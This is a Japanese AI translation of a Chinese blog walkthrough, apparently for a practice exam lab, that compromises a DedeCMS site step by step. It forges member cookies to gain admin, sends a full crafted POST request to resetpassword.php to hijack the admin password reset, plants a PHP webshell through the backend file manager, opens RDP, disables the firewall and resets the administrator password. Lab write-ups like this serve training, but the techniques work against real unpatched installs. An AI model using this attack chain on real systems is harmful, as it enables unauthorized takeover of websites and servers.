banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
ホームアーカイブ图文

pte-実践dedecms

#考证208
AI 翻訳
この記事はAIを通じて中国語から日本語に翻訳されました。原文を表示
AI が生成した要約
dedecms后台界面无法利用,尝试使用弱口令登录不成功。注册前台账号并登录后,复制last_vid__ckMd5的值,修改DedeUserID__ckMd5和DedeUserID的值为复制的last_vid__ckMd5和0001,刷新后变成admin用户。访问resetpassword.php页面,发送POST请求并获取链接,访问链接后可以修改密码。访问edit_baseinfo.php页面,填写原密码、新密码、验证码和邮箱,成功更新密码。使用admin/888888登录后台。上传shell文件并进行相关操作。

dedecms のバックエンドインターフェースは以下のようになります。

image

ディレクトリスキャンと robots.txt の内容は以下のようになりますが、利用できるものはありません。

image

バックエンドで弱いパスワードを試してもログインできません。フロントエンドアカウントを登録して、ユーザー名とパスワードを 0001/111111 に設定します。セキュリティの質問は入力しないでください。

登録が成功したら、http://10.1.10.62/member/index.php?uid=0001 にアクセスして以下の画面に移動します。

F12 キーを押してウェブ要素を表示し、last_vid__ckMd5 の値をコピーします。

last_vid__ckMd5 をコピーしたら、0001 アカウントでログインします。

image

Cookies Manager を開き、ウェブサイトの IP を検索します。

image

DedeUserID__ckMd5 の値を以前にコピーした last_vid__ckMd5 の内容に変更します。変更前の値は以下のようになります。

image

変更後は以下のようになります。

image

DedeUserID を 0001 に変更し、2 つの値を変更したら、Refresh をクリックして閉じます。

image

ページを更新すると、管理者ユーザーになります。

image

http://10.1.10.62/member/resetpassword.php にアクセスし、次のパケットを送信します。

POST /member/resetpassword.php HTTP/1.1
Host: 10.1.10.62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

dopost=safequestion&safequestion=0.0&safeanswer=&id=1

image

レスポンスパケットのこのリンクに注意してください。

image

コピーしてください。

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM

amp; を削除します。

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM

ブラウザでアクセスします。

パスワードを変更するページに直接移動します。

image

パスワードを 666666 に設定します。

これはフロントエンドの admin ユーザーのパスワードです。次にバックエンドのユーザー名のパスワードを変更する必要があります。

アクセス:

http://10.1.10.62/member/edit_baseinfo.php

プロフィールの完了ページに移動し、完了ボタンをクリックします。

image

再度、http://10.1.10.62/member/edit_baseinfo.php にアクセスすると、以下のページに移動します。

image

元のパスワードは 666666 で、新しいパスワードを 888888 に変更し、キャプチャとメールアドレスを入力して更新します。

バックエンドにアクセスし、admin/888888 でログインします。ログインに成功しました。

image

次はバックエンドでのシェルのアップロードです。

ファイルマネージャーに移動し、新しいファイルを作成します。

image

ファイル名は s.php で、シェルを書きます。

image

ファイルは以下のようになります:

image

蚁剣の Base64 エンコードリンク

image

image

3389 が開いていない場合は、ツールパッケージに含まれる vbs スクリプトをアップロードしてポートを開くことができます。

image

ファイアウォールを無効にします。

image

管理者のパスワードを変更します。

image

リモートデスクトップでログインします。

image

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。